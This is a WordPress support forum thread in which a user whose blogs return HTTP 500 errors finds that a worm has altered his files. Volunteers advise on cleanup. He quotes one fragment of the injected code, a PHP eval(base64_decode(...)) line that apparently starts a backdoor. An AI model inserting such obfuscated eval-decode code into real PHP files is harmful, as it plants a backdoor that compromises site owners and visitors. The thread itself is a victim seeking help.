WordPress › Support » help I lost everything & can not get anywhere

mattw21
Member
Posted 1 month ago #

my blog is at ezmoney.ezgo-now.com. my 2nd blog is ezpro-now. I deleted the 2nd one. I had installed wp-o-matic on the 2nd blog which I use a test blog. I was sure wp-o-matic was the problem.It is completley gone now & I still can not get into my good blog. I'm freakin out at this point. I am not a wp expert but I am quite compenant & have not had a problem in 4 months.

At this point I would just like to upgrade to 2.8.4 asuming I can find my blog to upgrade. Prehaps I should just start fresh but I can;t loose my stuff. I have 80 hrs. worth of blood sweat & tears. I do have another web site as well & it works so I don't think it's my domain.
ezgo-now.com

Thanks
samboll
moderator
Posted 1 month ago #

delete the .htaccess in the subdomain
ezmoney.ezgo-now.com
blog should come up
log in
regenerate permalinks
admin - settings - permalinks
mattw21
Member
Posted 1 month ago #

THANK YOU BUT I'M AFRAID IT DID NOT WORK. I DELETED .HTACCESS FOR SOME REASON IT DOES NOT SHOW UP IN FILEZILLA BUT FINDING IT WITH MY FILE MANAGER WAS NOT A PROBLEM. WHEN I ENTER EZMONEY.EZGO-NOW.COM I GET A WEBSITE CANOT BE DISPLAYED http 500. Both of my sites where running perfectly. I got back into them this morning & I got zip. I have made no changes, plug-ins, widgets, etc. As I said I thouight the wp-o-matic might have fouled something up as I did have some problems with that at first. But thats been in my test blog for about a week now. I emailed Chilly Domain thinking that there might be a problem on there end although I have a regular web page running on ezgo-now.com & it works fine. I am going to upgrade to 2.8 but at this point I don't think thats going to get it working. I mean I just can not see anything that looks like a problem. Things where working just to darn well. Thanks
mattw21
Member
Posted 1 month ago #

I just looked & I also have htaccess file in my main domain ezgo-now.com. Should I remove it there as well?
numeeja
Member
Posted 1 month ago #

Do you have a backup of your files & database?

Do you have access to your database in phpmyadmin?

When you connect with filezilla can you see the wordpress files?
mattw21
Member
Posted 1 month ago #

Yes, I B/U last week. I was planning on upgrading but never got around to it. And yes either MySQL or phpMyAdmin. I can see everything in filezilla& everything seems to be where it has always been. It is probably simple once it comes to light. I honestly can not find anything out of sorts. I like a good challange but this is getting a little frustrating.

Thank you
jonimueller
Member
Posted 1 month ago #

Some FTP clients hide files such as .htaccess. The filter (at least in WS-FTP) to display those "hidden" files is -la.

Backup any .htaccess files you have and upload a blank .htaccess file (use notepad -- not MS Word!) to create a blank .htaccess file and upload it via FTP. Change its permissions to 666. Then see if the 500 Internal Server Error goes away. If so, you should be able to login to your WP dashboard and set up your permalinks again. Once you do that and things are still running okay, for security's sake, go back to FTP and set the permissions on .htaccess back to 644.
mattw21
Member
Posted 1 month ago #

I wish I could say my problem is fixed but it's only gotten worse. Since I was down anyway I tried to upgrade 2.6 to 2.8. Lots of weird problems. Found a few thousand similar to identical problems in the forums & tried a bunch of fixes but no go. So I gave up, carefully went through all of my dirs., files, etc, cleaned up the scraps & did a fresh clean install in the root directory.(http://ezgo-now.com) My other blog was & still is in a sub-directory.(http://ezmoney/ezgo-now.com) Anyway I got it installed, it worked fine I went to lunch. Came back later tried to open it & Whooa, same flippen problem. It can't be found, http 500 server error. PART 2// Today I found some real bad ugly changes to the wp-config.php & index.php files. Best description would be alphabet soup over 1/2 of the page. I haven’t seen anything like since my daughter was 3. Is there any possible way that wp-o-matic could be the culprit even though I was only running it on my test blog? I deleted that blog & wp-o-matic because I suspected it, its use immediately preceded all of my problems. Thanks Matt
mattw21
Member
Posted 1 month ago #

I probably should start a new post but, well anyway I think I might have been hacked. Yesterday I backed up the remaining files in the EZmoney sub-directory, deleted everything, installed a fresh copy of 2.8.4, tested everything, logged off & called it a night. That was about 2am This AM before I even brought the NEW ezgo-now.com Blog up I checked the new files I had uploaded yesterday. The wp-config.php, index.php, and wp-content/index.php files where once again loaded with alphabet soap. The xmlrpc.php file appears to be ok but it's a big file so I could have missed something. It's not full of random letters anyway. Since this blog hasn’t been used yet (20 min of testing) I don't have an htaccess file yet. (I'm using the ground-floor theme.)
I have spent the entire day learning everything I can about this problem. I think I know what happened but I’d like a 2nd opinion plus I want to make sure that I do whatever is necessary to minimize future problems. Since I had never even considered that a hacker had corrupted these files I uploaded my old plug-ins & themes folder as well as my image files inside the wp-includes folder. Sure enough the index.php file inside the themes folder is corrupted with letters as well as all the individual index.php files for each theme. The corrupted files themselves are all pretty much the same (see below, the bold txt. Is the random letters) & are nothing more than a bunch of benign letters. I have not found anything that resembles malicious code or script. However I've been doing this for 3 months so I'm really not sure I know what I'm looking for. But I do know I need some help. I can re-load the software easy enough but I need to find the source of the problem. I'm very thankful to be going through this early-on & not a year from now with a fully developed site & steady traffic.
<?php eval(base64_decode('aW snZSddKSk7')); ?><?php /**
Thanking you in advance. Matt
numeeja
Member
Posted 1 month ago #

It sounds like you fell victim to the worm before you upgraded. Once infected, upgrading does not fix it, as the backdoors are still there.

http://wordpress.org/support/topic/307660?replies=1

http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
mattw21
Member
Posted 1 month ago #

Thanks for the reply & the info. I know I still have much to learn but the 1 thing I know I will never learn or at least never understand is why? Why on earth would anyone especially someone with enough intelligence to hack into a site, hack into a site? To do it for personal gain or to settle a score is inexcusable. But to do it for the sake of doing it just blows my mind. Obviously this scum outgrew spray painting graffiti, knocking over trash cans & throwing eggs at passing cars. There I feel a little better.

I will delete everything, run a scan, change username & passwords, download new & reinstall as per the instructions & suggestions from the above links. I'll also check my data base.
I did have 1 fully developed blog using the original (un-changed) amazing grace theme & running wp-2.6.4. Which files contain my post & my pages & or which files should I keep? Even though I am going to rebuild everything new at the very least I'd like to keep my pages & post. Are those files stored in the data base?
Thanks,
Matt
numeeja
Member
Posted 1 month ago #

Its an automated worm. Once a site is infected it launches attacks on other sites so spreading. I believe that apart from putting spam links on blogs it also trys to install malware on visitors PCs. Its not like keying cars - the ultimate aim is to separate people from their money.

The vulnerability that was exploited by this worm has been fixed in the latest versions which is why it is important to keep updated. Unfortunately upgrading after being attacked does not clean it up.

Your database will be dirty so you'll need to clean it up or more likely export the real data to a file (tools -> export) and import into a new clean database, but checking it carefully.

I'm afraid can't really offer any in depth advice on the process as my sites have not fallen victim to this so I have not had the need to really consider the best way to deal with it.

Hopefully someone else will be able to chip in with a link to an in-depth step by step run-through which has worked for them.

If not and/or you do not feel up to doing it for yourself I'm sure you'll be able to find a paid consultant to help via a message to the WP-Pro mailing list.

Good Luck & I hope you manage to get it sorted out with the minimum of hassle.
mattw21
Member
Posted 2 weeks ago #

Thank you. I’ve been away for a week but I’m back to finis this.

I have installed a fresh copy of WP 2.8 & it is working fine. Before installing it I had deleted all of my old database tables in my ezgo-now_wp database. I.e. wp1, wp2, wp3, etc. (I had multiple blogs)I changed the database table prefix in my new wp config file to wp2. (this is a new wp2 prefix as I had already deleted the old wp2 tables) I wanted to delete the original wp_ tables as well but got cold feet at the last minute. Since these old tables are the only thing left that could still have malicious code in them I really want to delete them. (they are safely backed up just in case)
Am I safe to delete these? I’m almost positive I am but I didn’t because they have the same name as the database.

To summarize I have a new EZgo-Now blog up and running. The ezgo-now_wp database has 10 newly created tables with a wp2 prefix & 15 old tables with a wp_ prefix. Am I safe to delete those 15 old wp_ tables?

Thank you
Matt

Reply

You must log in to post.

WordPress.org

Forums

help I lost everything & can not get anywhere (13 posts)

Reply

About this Topic

Tags

Code is Poetry